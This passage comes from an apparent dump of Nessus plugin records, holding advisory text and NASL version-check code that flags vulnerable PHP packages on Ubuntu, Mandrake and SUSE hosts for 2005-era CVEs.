(ubuntu_check(osver:\"4.10\", pkgname:\"php4-gd\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-ldap\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-mcal\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-mhash\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-mysql\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-odbc\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-pear\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-recode\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-snmp\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-sybase\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"4.10\", pkgname:\"php4-xslt\", pkgver:\"4.3.8-3ubuntu7.14\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapache-mod-php4\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"libapache2-mod-php4\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-cgi\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-cli\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-common\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-curl\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-dev\", pkgver:\"4.3.10-10ubuntu4.3\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-domxml\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-gd\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-imap\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-ldap\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-mcal\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-mhash\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-mysql\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-odbc\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-pear\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-recode\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-snmp\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-sybase\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-universe-common\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.04\", pkgname:\"php4-xslt\", pkgver:\"4.3.10-10ubuntu3.6\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache-mod-php4\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php4\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"libapache2-mod-php5\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php-pear\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-cgi\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-cli\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-common\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-curl\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-dev\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-domxml\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-gd\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-ldap\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-mcal\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-mhash\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-mysql\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-odbc\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-pear\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-pgsql\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-recode\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-snmp\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-sybase\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php4-xslt\", pkgver:\"4.4.0-3ubuntu1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cgi\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-cli\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-common\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-curl\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-dev\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-gd\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-ldap\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mhash\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-mysql\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-odbc\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-pgsql\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-recode\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-snmp\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sqlite\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-sybase\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xmlrpc\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\nif (ubuntu_check(osver:\"5.10\", pkgname:\"php5-xsl\", pkgver:\"5.0.5-2ubuntu1.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libapache-mod-php4 / libapache2-mod-php4 / libapache2-mod-php5 / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-20T13:25:43", "description": "According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.1 or 5.0.6. Such versions fail to protect the\n'$GLOBALS' superglobals variable from being overwritten due to\nweaknesses in the file upload handling code as well as the 'extract()'\nand 'import_request_variables()' functions. Depending on the nature\nof the PHP applications on the affected host, exploitation of this\nissue may lead to any number of attacks, including arbitrary code\nexecution. \n\nIn addition, these versions may enable an attacker to exploit an\ninteger overflow flaw in certain certain versions of the PCRE library,\nto enable PHP's 'register_globals' setting even if explicitly disabled\nin the configuration, and to launch cross-site scripting attacks\ninvolving PHP's 'phpinfo()' function.", "edition": 26, "published": "2005-11-01T00:00:00", "title": "PHP < 4.4.1 / 5.0.6 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3388", "CVE-2005-3389", "CVE-2005-3390", "CVE-2005-2491", "CVE-2002-0229"], "modified": "2005-11-01T00:00:00", "cpe": ["cpe:/a:php:php"], "id": "PHP_4_4_1.NASL", "href": "https://www.tenable.com/plugins/nessus/20111", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20111);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\n \"CVE-2002-0229\",\n \"CVE-2005-2491\",\n \"CVE-2005-3388\",\n \"CVE-2005-3389\",\n \"CVE-2005-3390\"\n );\n script_bugtraq_id(\n 14620,\n 15248,\n 15249,\n 15250\n );\n\n script_name(english:\"PHP < 4.4.1 / 5.0.6 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for multiple vulnerabilities in PHP < 4.4.1 / 5.0.6\");\n \n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote web server uses a version of PHP that is affected by\nmultiple flaws.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"According to its banner, the version of PHP installed on the remote\nhost is older than 4.4.1 or 5.0.6. Such versions fail to protect the\n'$GLOBALS' superglobals variable from being overwritten due to\nweaknesses in the file upload handling code as well as the 'extract()'\nand 'import_request_variables()' functions. Depending on the nature\nof the PHP applications on the affected host, exploitation of this\nissue may lead to any number of attacks, including arbitrary code\nexecution. \n\nIn addition, these versions may enable an attacker to exploit an\ninteger overflow flaw in certain certain versions of the PCRE library,\nto enable PHP's 'register_globals' setting even if explicitly disabled\nin the configuration, and to launch cross-site scripting attacks\ninvolving PHP's 'phpinfo()' function.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_182005.77.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_192005.78.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.hardened-php.net/advisory_202005.79.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.php.net/release_4_4_1.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to PHP version 4.4.1 / 5.0.6 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/11/01\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/08/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:php:php\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n\n script_dependencies(\"php_version.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"audit.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nphp = get_php_from_kb(\n port : port,\n exit_on_fail : TRUE\n);\n\nversion = php[\"ver\"];\nsource = php[\"src\"];\n\nbackported = get_kb_item('www/php/'+port+'/'+version+'/backported');\n\nif (report_paranoia < 2 && backported)\n audit(AUDIT_BACKPORT_SERVICE, port, \"PHP \"+version+\" install\");\n\nif (version =~ \"^3\\.\" ||\n version =~ \"^4\\.([0-3]\\.|4\\.0($|[^0-9]))\" || \n version =~ \"^5\\.0\\.[0-5]($|[^0-9])\"\n)\n{\n set_kb_item(name:\"www/\"+port+\"/XSS\", value:TRUE);\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : '+source +\n '\\n Installed version : '+version+\n '\\n Fixed version : 4.4.1 / 5.0.6\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_LISTEN_NOT_VULN, \"PHP\", port, version);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:51:30", "description": "A number of vulnerabilities were discovered in PHP :\n\nAn issue with fopen_wrappers.c would not properly restrict access to\nother directories when the open_basedir directive included a trailing\nslash (CVE-2005-3054); this issue does not affect Corporate Server\n2.1.\n\nAn issue with the apache2handler SAPI in mod_php could allow an\nattacker to cause a Denial of Service via the session.save_path option\nin an .htaccess file or VirtualHost stanza (CVE-2005-3319); this issue\ndoes not affect Corporate Server 2.1.\n\nA Denial of Service vulnerability was discovered in the way that PHP\nprocesses EXIF image data which could allow an attacker to cause PHP\nto crash by supplying carefully crafted EXIF image data\n(CVE-2005-3353).\n\nA cross-site scripting vulnerability was discovered in the phpinfo()\nfunction which could allow for the injection of JavaScript or HTML\ncontent onto a page displaying phpinfo() output, or to steal data such\nas cookies (CVE-2005-3388).\n\nA flaw in the parse_str() function could allow for the enabling of\nregister_globals, even if it was disabled in the PHP configuration\nfile (CVE-2005-3389).\n\nA vulnerability in the way that PHP registers global variables during\na file upload request could allow a remote attacker to overwrite the\n$GLOBALS array which could potentially lead the execution of arbitrary\nPHP commands. This vulnerability only affects systems with\nregister_globals enabled (CVE-2005-3390).\n\nThe updated packages have been patched to address this issue. Once the\nnew packages have been installed, you will need to restart your Apache\nserver using 'service httpd restart' in order for the new packages to\ntake effect ('service httpd2-naat restart' for MNF2).", "edition": 25, "published": "2006-01-15T00:00:00", "title": "Mandrake Linux Security Advisory : php (MDKSA-2005:213)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3388", "CVE-2005-3392", "CVE-2005-3054", "CVE-2005-3389", "CVE-2005-3319", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-2491"], "modified": "2006-01-15T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:php-fcgi", "p-cpe:/a:mandriva:linux:lib64php_common432", "p-cpe:/a:mandriva:linux:php-cgi", "cpe:/o:mandrakesoft:mandrake_linux:10.1", "p-cpe:/a:mandriva:linux:lib64php5_common5", "p-cpe:/a:mandriva:linux:php432-devel", "p-cpe:/a:mandriva:linux:php-cli", "cpe:/o:mandriva:linux:2006", "p-cpe:/a:mandriva:linux:libphp5_common5", "x-cpe:/o:mandrakesoft:mandrake_linux:le2005", "p-cpe:/a:mandriva:linux:php-devel", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:libphp_common432"], "id": "MANDRAKE_MDKSA-2005-213.NASL", "href": "https://www.tenable.com/plugins/nessus/20445", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2005:213. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(20445);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2005-2491\", \"CVE-2005-3054\", \"CVE-2005-3319\", \"CVE-2005-3353\", \"CVE-2005-3388\", \"CVE-2005-3389\", \"CVE-2005-3390\", \"CVE-2005-3391\", \"CVE-2005-3392\");\n script_xref(name:\"MDKSA\", value:\"2005:213\");\n\n script_name(english:\"Mandrake Linux Security Advisory : php (MDKSA-2005:213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A number of vulnerabilities were discovered in PHP :\n\nAn issue with fopen_wrappers.c would not properly restrict access to\nother directories when the open_basedir directive included a trailing\nslash (CVE-2005-3054); this issue does not affect Corporate Server\n2.1.\n\nAn issue with the apache2handler SAPI in mod_php could allow an\nattacker to cause a Denial of Service via the session.save_path option\nin an .htaccess file or VirtualHost stanza (CVE-2005-3319); this issue\ndoes not affect Corporate Server 2.1.\n\nA Denial of Service vulnerability was discovered in the way that PHP\nprocesses EXIF image data which could allow an attacker to cause PHP\nto crash by supplying carefully crafted EXIF image data\n(CVE-2005-3353).\n\nA cross-site scripting vulnerability was discovered in the phpinfo()\nfunction which could allow for the injection of JavaScript or HTML\ncontent onto a page displaying phpinfo() output, or to steal data such\nas cookies (CVE-2005-3388).\n\nA flaw in the parse_str() function could allow for the enabling of\nregister_globals, even if it was disabled in the PHP configuration\nfile (CVE-2005-3389).\n\nA vulnerability in the way that PHP registers global variables during\na file upload request could allow a remote attacker to overwrite the\n$GLOBALS array which could potentially lead the execution of arbitrary\nPHP commands. This vulnerability only affects systems with\nregister_globals enabled (CVE-2005-3390).\n\nThe updated packages have been patched to address this issue. Once the\nnew packages have been installed, you will need to restart your Apache\nserver using 'service httpd restart' in order for the new packages to\ntake effect ('service httpd2-naat restart' for MNF2).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_182005.77.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_192005.78.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.hardened-php.net/advisory_202005.79.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp_common432\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php432-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2006\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:mandrakesoft:mandrake_linux:le2005\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/11/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/01/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.1\", cpu:\"x86_64\", reference:\"lib64php_common432-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", cpu:\"i386\", reference:\"libphp_common432-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"php-cgi-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"php-cli-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.1\", reference:\"php432-devel-4.3.8-3.6.101mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK10.2\", cpu:\"x86_64\", reference:\"lib64php_common432-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", cpu:\"i386\", reference:\"libphp_common432-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-cgi-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php-cli-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.2\", reference:\"php432-devel-4.3.10-7.4.102mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK2006.0\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", cpu:\"i386\", reference:\"libphp5_common5-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cgi-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-cli-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-devel-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-exif-5.0.4-1.1.20060mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK2006.0\", reference:\"php-fcgi-5.0.4-9.1.20060mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T14:14:46", "description": "The remote host is missing the patch for the advisory SUSE-SA:2005:069 (php4,php5).\n\n\nUpdated PHP packages fix the following security issues:\n\n- Stefan Esser found out that a bug in parse_str() could lead to\nactivation of register_globals (CVE-2005-3389) and additionally\nthat file uploads could overwrite $GLOBALS (CVE-2005-3390)\n\n- Bugs in the exif code could lead to a crash (CVE-2005-3353)\n\n- Missing safe_mode checks in image processing code and cURL\nfunctions allowed to bypass safe_mode and open_basedir\n(CVE-2005-3391)\n\n- Information leakage via the virtual() function (CVE-2005-3392)\n\n- Missing input sanitation in the mb_send_mail() function\npotentially allowed to inject arbitrary mail headers\n(CVE-2005-3883)\n\nThe previous security update for php caused crashes when mod_rewrite\nwas used. The updated packages fix that problem as well.", "edition": 6, "published": "2005-12-20T00:00:00", "title": "SUSE-SA:2005:069: php4,php5", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-3353", "CVE-2005-3392", "CVE-2005-3389", "CVE-2005-3391", "CVE-2005-3390", "CVE-2005-3883"], "modified": "2005-12-20T00:00:00", "cpe": [], "id": "SUSE_SA_2005_069.NASL", "href": "https://www.tenable.com/plugins/nessus/20335", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# This plugin text was extracted from SuSE Security Advisory SUSE-SA:2005:069\n#\n\n\nif ( ! defined_func(\"bn_random\") ) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif(description)\n{\n script_id(20335);\n script_version(\"1.9\");\n \n name[\"english\"] = \"SUSE-SA:2005:069: php4,php5\";\n \n script_name(english:name[\"english\"]);\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing the patch for the advisory SUSE-SA:2005:069 (php4,php5).\n\n\nUpdated PHP packages fix the following security issues:\n\n- Stefan Esser found out that a bug in parse_str() could lead to\nactivation of register_globals (CVE-2005-3389) and additionally\nthat file uploads could overwrite $GLOBALS (CVE-2005-3390)\n\n- Bugs in the exif code could lead to a crash (CVE-2005-3353)\n\n- Missing safe_mode checks in image processing code and cURL\nfunctions allowed to bypass safe_mode and open_basedir\n(CVE-2005-3391)\n\n- Information leakage via the virtual() function (CVE-2005-3392)\n\n- Missing input sanitation in the mb_send_mail() function\npotentially allowed to inject arbitrary mail headers\n(CVE-2005-3883)\n\nThe previous security update for php caused crashes when mod_rewrite\nwas used. The updated packages fix that problem as well.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.suse.de/security/advisories/2005_14_sa.html\" );\n script_set_attribute(attribute:\"risk_factor\", value:\"Medium\" );\n\n\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2005/12/20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n script_end_attributes();\n\n \n summary[\"english\"] = \"Check for the version of the php4,php5 package\";\n script_summary(english:summary[\"english\"]);\n \n script_category(ACT_GATHER_INFO);\n \n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n family[\"english\"] = \"SuSE Local Security Checks\";\n script_family(english:family[\"english\"]);\n \n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/SuSE/rpm-list\");\n exit(0);\n}\n\ninclude(\"rpm.inc\");\nif ( rpm_check( reference:\"apache2-mod_php4-4.4.0-6.6\", release:\"SUSE10.0\") )\n{\n security_warning(0);\n exit(0);\n}\nif ( rpm_check( 